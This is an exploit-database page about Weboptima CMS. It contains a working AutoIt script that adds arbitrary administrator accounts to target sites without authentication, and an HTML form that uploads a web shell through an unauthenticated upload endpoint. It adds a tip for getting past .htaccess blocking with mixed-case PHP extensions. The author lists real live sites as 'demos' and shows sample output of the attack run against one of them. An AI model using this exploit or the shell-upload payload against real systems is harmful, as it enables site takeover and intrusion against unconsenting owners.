Weboptima CMS Add Administrator & Shell Upload

2013.01.24
Credit: AkaStep
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

#cs 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm AkaStep member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 weboptima_cms_remote_add_admin_shell_upload.au3 ============================================ Vulnerable Software: Weboptima CMS Vendor: http://weboptima.am/ Vulns: REMOTE SHELL UPLOAD AND REMOTE ARBITRARY ADD ADMIN. Both Exploits are available(HTML exploit to upload shell) And Autoit Exploit to add arbitrary admin accounts to target site. More detailts below. ============================================ Few DEMOS: http://navasards.am http://olivergroup.am http://iom.am http://bluefly.am http://invest-in-armenia.com http://decart.am http://armgeokart.am/ ============================================ About Vulns: 1'ST vulnerability is REMOTE SHELL UPLOAD: Any *UNAUTHENTICATED* USER CAN UPLOAD SHELL. Vulnerable code: //cms/upload.php =============SNIP BEGINS====================== <?php $path="../uploades"; if(!file_exists($path)) { mkdir($path, 0777); } if(isset($_GET['name'])) { unlink($path."/".$_GET['name']); $letter = $_GET['letter']; $selTypey = $_GET['selType']; header("Location: upload.php?letter=$letter&selType=$selTypey"); } ?> <?php include_once("start.php"); ?> <div align="center"> <table align="center"> <tr> <td colspan="3" align="center"><span class="title">????? ??????</span></td> </tr> <tr> <td> <?php if(isset($_POST['sub'])) { $fileName = $_FILES["up_file"]['name']; $masSimbl = array('&','%','#'); if(in_array($fileName[0], $masSimbl)) { echo $fileName[0].' ???????? ?????? ????? ???????'; } else { move_uploaded_file($_FILES["up_file"]['tmp_name'],"$path/".$_FILES["up_file"]['name']); } } ?> ========================SNIP ENDS================= Simple HTML exploit to upload your shell: <form method="post" action="http://CHANGE_TO_TARGET/cms/upload.php" enctype="multipart/form-data"> <input type="file" name="up_file" />&nbsp;&nbsp;<input type="submit" class="button" name="sub" value="send"></form> After Successfully shell upload your shell can be found: http://site.tld/uploades/shellname.php NOTE: There may be simple .htaccess to prevent you from accessing shell(HTTP 403). This is not problem just upload your shell like: myshell.PhP or myshell.pHp OWNED. 2'nd vulnerability is: REMOTE ADD ADMIN Any *UNAUTHENTICATED* USER CAN ADD ARBITRARY ADMIN ACCOUNT(s) TO TARGET SITE. Vulnerable Code: //cms/loginPass.php Notice: header() without exit;*Script continues it's execution.* ==================SNIP BEGINS========= <?php session_start(); if($_SESSION['status_shoping_adm']!="adm_shop") { header("Location: index.php"); } require_once('../myClass/DatabaseManeger.php'); require_once("../myClass/function.php"); $_POST = stripSlash($_POST); $_GET = stripSlash($_GET); ?> <?php $error = ""; //And more stuff ==================SNIP ENDS============= And here is exploit written in Autoit to exploit this vulnerability and add admin to target site. Exploit usage(CLI): weboptima.exe http://decart.am AzerbaijanBlackHatzWasHere AzerbaijanBlackHatzWasHere ############################################################## Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8) Usage: weboptima.exe http://site.tld username password [*] DON'T HATE THE HACKER, HATE YOUR OWN CODE! [*] [@@@] Vuln & Exploit By AkaStep [@@@] ############################################################## [+] GETTING INFO ABOUT CMS [+] [*] GOT Response : Yes! It is exactly that we are looking for! [*] ################################################## Trying to add new admin: To Site:www.decart.am With Username: AzerbaijanBlackHatzWasHere With Password: AzerbaijanBlackHatzWasHere ################################################## ################################################## Exploit Try Count:1 ################################################## Error Count:0 ################################################## ################################################## Exploit Try Count:2 ################################################## Error Count:0 ################################################## Count of errors during exploitation : 0 ################################################## [*] Yaaaaa We are Going To Travel xD [*] Try to login @ Site: decart.am/cms/index.php With Username: AzerbaijanBlackHatzWasHere With Password: AzerbaijanBlackHatzWasHere *NOTE* Make Sure Your Browser Reveals HTTP REFERER! OTHERWISE YOU WILL UNABLE TO LOGIN! ################################################## [*] Exit [*] ################################################## #ce #NoTrayIcon #Region ;**** Directives created by AutoIt3Wrapper_GUI **** #AutoIt3Wrapper_UseUpx=n #AutoIt3Wrapper_Change2CUI=y #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI **** #NoTrayIcon #include "WinHttp.au3" #include <inet.au3> #include <String.au3> $exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _ 'Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8) ' & @CRLF & _ 'Usage: ' & @ScriptName & ' http://site.tld ' & ' username ' & 'password ' & _ @CRLF & "[*] DON'T HATE THE HACKER, HATE YOUR OWN CODE! [*]" & @CRLF & _ '[@@@] Vuln & Exploit By AkaStep [@@@]' & @CRLF & _StringRepeat('#',62); ConsoleWrite(@CRLF & $exploitname & @CRLF) $method='POST'; $vulnurl='cms/loginPass.php?test=' & Random(1,15677415,1); Global $count=0,$error=0; $cmsindent='kcaptcha'; # We will use it to identify CMS #; $adminpanel='/cms/index.php'; ;#~ Impersonate that We Are Not BOT or exploit.We are human who uses IE. Dohhh))# ~; $useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)'; $msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://site.tld ' & ' usernametoadd ' & 'passwordtoadd' & @CRLF if $CmdLine[0] <> 3 Then MsgBox(64,"",$msg_usage); ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF); exit; EndIf if $CmdLine[0]=3 Then $targetsite=$CmdLine[1]; $username=$CmdLine[2]; $password=$CmdLine[3]; EndIf if StringStripWS($targetsite,8)='' OR StringStripWS($username,8)='' OR StringStripWS($password,8)='' Then ConsoleWrite('Are you kidding me?'); Exit; EndIf HttpSetUserAgent($useragent) $doublecheck=InetGet($targetsite,'',1); if @error Then ConsoleWrite('[*] Are you sure that site exist? Theris an error! Please Try again! [*]' & @CRLF) Exit; EndIf ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF); sleep(Random(1200,2500,1)); HttpSetUserAgent($useragent); $sidentify=_INetGetSource($targetsite & $adminpanel,True); if StringInStr($sidentify,$cmsindent) Then ConsoleWrite("[*] GOT Response : Yes! It is exactly that we are looking for! [*]" & @CRLF) Else ConsoleWrite("[*] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. [*]" & @CRLF) $error+=1; EndIf $targetsite='www.' & StringReplace(StringReplace($targetsite,'http://',''),'/','') priv8($targetsite,$username,$password,$count,$error);#~ do the magic for me plizzz));~# Func priv8($targetsite,$username,$password,$count,$error) $count+=1;~ #~ We are not going to exploit in infinitive manner xD #~; Global $sAddress = $targetsite $triptrop=@CRLF & _StringRepeat('#',50) & @CRLF; $whatcurrentlywedo=$triptrop & 'Trying to add new admin: ' & @CRLF & 'To Site:' & $targetsite & @CRLF & 'With Username: ' & _ $username & @CRLF & 'With Password: ' & $password & $triptrop; if $count <=1 then ConsoleWrite($whatcurrentlywedo) $doitnicely=$triptrop & 'Exploit Try Count:' & $count & $triptrop & 'Error Count:' & $error & $triptrop; ConsoleWrite($doitnicely); Global $sPostData = "login=" & $username & "&password=" & $password & "&status=1" & "&add_sub=Add+New"; if $error>=2 OR $count>=2 Then ConsoleWrite('Count of errors during exploitation : ' & $error & @CRLF) if int($error)=0 then ConsoleWrite($triptrop & '[*] Yaaaaa We are Going To Travel xD [*]' & _ @CRLF & 'Try to login @ ' & @CRLF & _ 'Site: ' & $targetsite & $adminpanel & @CRLF &'With Username: ' & _ $username & @CRLF & 'With Password: ' & $password & @CRLF & _ '*NOTE* Make Sure Your Browser Reveals HTTP REFERER!' & @CRLF & _ ' OTHERWISE YOU WILL UNABLE TO LOGIN! ' & $triptrop & '[*] Exit [*]' & $triptrop); exit; Else ConsoleWrite($triptrop & '[*] Seems Is not exploitable or Vuln Fixed? [*]' & @CRLF & _ '[*] Anyway,try to login with new credentials. [*]' & @CRLF & _ '[*] May be you are Lucky;) [*]' & _ @CRLF & 'Try to login @ ' & @CRLF & _ 'Site: ' & $targetsite & $adminpanel & @CRLF & _ 'With Username: ' & $username & @CRLF & 'With Password: ' & $password & $triptrop & '[*] Exit [*]' & $triptrop); EndIf exit; EndIf Global $hOpen = _WinHttpOpen($useragent); Global $hConnect = _WinHttpConnect($hOpen, $sAddress) Global $hRequest = _WinHttpOpenRequest($hConnect,$method,$vulnurl,Default,Default,''); _WinHttpAddRequestHeaders($hRequest, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8") _WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-US,en;q=0.5") _WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate") _WinHttpAddRequestHeaders($hRequest, "DNT: 1") _WinHttpAddRequestHeaders($hRequest, "Referer: " & $targetsite & $vulnurl);# We need it #; _WinHttpAddRequestHeaders($hRequest, "Cookie: ComeToPwnYou");#~ Not neccessary just for compatibility.Change or "rm" it if you want. #~; _WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive") _WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded") _WinHttpAddRequestHeaders($hRequest, "Content-Length: " & StringLen($sPostData)); _WinHttpSendRequest($hRequest, -1, $sPostData) _WinHttpReceiveResponse($hRequest) Global $sHeader, $sReturned If _WinHttpQueryDataAvailable($hRequest) Then $sHeader = _WinHttpQueryHeaders($hRequest) Do $sReturned &= _WinHttpReadData($hRequest) Until @error _WinHttpCloseHandle($hRequest) _WinHttpCloseHandle($hConnect) _WinHttpCloseHandle($hOpen) $targetsite=StringMid($targetsite,5,StringLen($targetsite)) Sleep(Random(10000,20000,1)); priv8($targetsite,$username,$password,$count,$error);#~ Pass to function and TRY to Exploit #~; Else $error+=1;#~ iNCREMENT ERROR(s) COUNT. CUZ SOMETHING WENT WRONG ~#; _WinHttpCloseHandle($hRequest) _WinHttpCloseHandle($hConnect) _WinHttpCloseHandle($hOpen) $targetsite=StringMid($targetsite,5,StringLen($targetsite)) Sleep(Random(10000,20000,1)); priv8($targetsite,$username,$password,$count,$error);#~double check anyway.;~# EndIf EndFunc;=> priv8(); #cs ================================================ KUDOSSSSSSS ================================================ packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com itsecuritysolutions.org to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * To All Turkish Hackers Also special thanks to: ottoman38 & HERO_AZE ================================================ /AkaStep #ce

References:

http://weboptima.am/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top